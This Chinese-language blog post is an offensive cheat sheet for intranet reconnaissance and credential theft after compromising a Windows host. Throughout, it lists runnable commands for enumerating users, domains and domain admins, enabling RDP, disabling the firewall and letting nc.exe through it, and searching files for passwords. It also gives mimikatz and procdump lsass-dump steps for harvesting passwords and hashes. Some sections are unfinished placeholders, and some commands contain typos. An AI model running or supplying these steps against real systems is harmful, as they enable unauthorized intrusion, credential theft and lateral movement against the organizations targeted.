内网信息搜集

内网信息搜集

Posted by 木已成舟 on January 17, 2021

0x00 环境分析

当拿到一台主机的权限时,首先是对环境进行分析,反问自己2个问题。

  1. 该主机位于什么区域,DMZ区,办公区,还是核心区?
  2. 该主机是什么角色,Web服务器,个人PC,还是其他的?

其次我参考了网上的一些文章,将内网信息搜集分为了4步,依次是本机(落地主机)信息收集、域内信息收集、登录凭证窃取、内网探测。

0x01 本机信息收集

本机信息包括了操作系统信息、系统体系结构、用户信息、网络配置信息、内网IP地址段、端口、服务、进程、软件版本信息、补丁、计划任务、共享文件、防火墙配置、本地敏感文件、凭证、是否有域等等。

操作系统

查看操作系统版本(中文版):systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

查看操作系统版本(英文版):systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

使用wmic命令查看操作系统版本:wmic OS get Caption,CSDVersion,OSArchitecture,Version

查看系统体系结构:echo %PROCESSOR_ARCHITECTURE%

查看系统补丁情况:systeminfo

使用wmic命令查看系统补丁情况:wmic qfe get Caption,Description,HotFixID,InstalledOn

查看主机开机时间:net statistics workstation

用户信息

用户信息包括用户列表、当前用户权限、当前在线用户情况。

查看用户列表:net user

查看用户权限:whoami && whoami /priv

查看当前在线用户情况:query user || qwinstaquser

网络信息

网络信息包括网络配置信息、路由信息、开放端口信息。

查看本机网络配置信息:ipconfig

查看DNS服务器:ipconfig /displaydns

查询路由信息:route printarp -a

查询本机开放的端口:netstat -ano

服务

查询本地服务:wmic service list brief

远程桌面服务

查看远程服务:reg query "hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\RDP-Tcp" /v portnumber

2003之前开启远程桌面服务:wmic path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

2003之后开启远程桌面服务需要三个命令:wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1reg add "HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

软件版本

查看安装的软件的版本、路径等:wmic product get name, version

使用Powershell查看软件版本信息:powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"

进程

查看是否存在杀软:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

查询进程信息:tasklist

使用wmic查询进程:wmic process list brief

计划任务

查看计划任务信息:schtasks /query /fo LIST /v

共享文件

查看共享列表:net share

使用wmic查看共享列表:wmic share get name,path,status

防火墙配置

查看防火墙配置

netsh firewall show config

关闭防火墙

2003之前的系统关闭防火墙:netsh firewall set opmode disable

2003之后的系统关闭防火墙:netsh advfirewall set allprofiles state off

修改防火墙配置

2003及之前系统允许指定程序通过:netsh firewall add allowedprogram c:\nc.exe "allow nc" ennable

2003 以后的系统版本指定程序通过:入站:netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"出站:netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"

3389端口放行:netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=alow

本地敏感文件

dir /b /s config.* 
dir /b /s login*txt
dir /b /s login*
dir /b /s *.bak
dir /b /s *.config
findstr /si password *.ini *.txt *.asp *.cgi

是否有域环境

whoami /all
ipconfig /all
net config workstation 
net time /domain
net view /domain

0x02 域内信息收集

域内信息搜集主要分为收集域内基础信息、探测域内存活主机、探测域内端口、定位域控、定位域管理员、定位域管理进程、凭证获取几个部分,探测域内存活主机、探测域内端口、凭证获取这三个部分会在后面展开,本节不展开。

收集域内基础信息

获取域用户SID:whoami /all

查询域内所有用户:net user /domain

查询指定域用户的详情信息:net user xxx /domain

查询域:net view /domain

查询域内的所有计算机 :net view /domain:SHQAX

查询所有域成员计算机列表:net group "domain computers" /domain

获取域信任信息:nltest /domain_trusts

定位域控

查询域控制器:net group "domain controllers" /domain

查看域控制器的机器名:nltest /DCLIST:SHQAX

定位域管理员

查询域管理员用户列表:net group "domain admins" /domain

查询域系统管理员用户组:net group "Enterprise admins" /domain

使用psloggedon.exe、PVEFindADUser.exe等相关工具定位域管理员

定位域管理进程

首先查询域管理员列表:net group “Domain Admins” /domain 再通过tasklist /v命令寻找进程所有者为域管理员的进程

0x03 登录凭证窃取

GPP漏洞

只存在于winserver 2008没有上补丁(KB2962486)的时候。

待补充。

mimikatz

获取本地帐户密码

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,需要通过修改注册表

#提升权限
privilege::debug

#抓取密码
sekurlsa::logonpasswords

离线获取账户密码

当mimikatz无法在主机上运行时,可以使用微软官方发布的工具Procdump导出lsass.exe:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

将lsass.dmp下载到本地后,然后执行mimikatz:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

读取域控中域成员Hash

在域控上执行mimikatz:

#提升权限
privilege::debug

抓取密码
lsadump::lsa /patch

哈希传递攻击

待补充

黄金/白银票据攻击

待补充

laZagne.exe

启动所有模块获取各类密码:laZagne.exe all

0x04 内网探测

当搜集完信息之后,你将对自己搜集到的内网网段地址进行存活探测和端口扫描,通过漏洞来渗透更多系统,扩大自己的战果。

在进行内网探测时,你可以将工具直接上传到主机上,也可以通过代理工具,在自己主机上进行扫描。

存活探测

存活探测可以使用ICMP协议、NetBios协议快速探测。

for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1.%P | findstr "TTL ="

nbtscan.exe192.168.191.2-250

端口扫描

推荐使用s扫描器,对常见的一些高危端口进行扫描。

s.exe 172.31.81.1-254 445,8080,8081,8089,9090,8888,9999,9080 tcp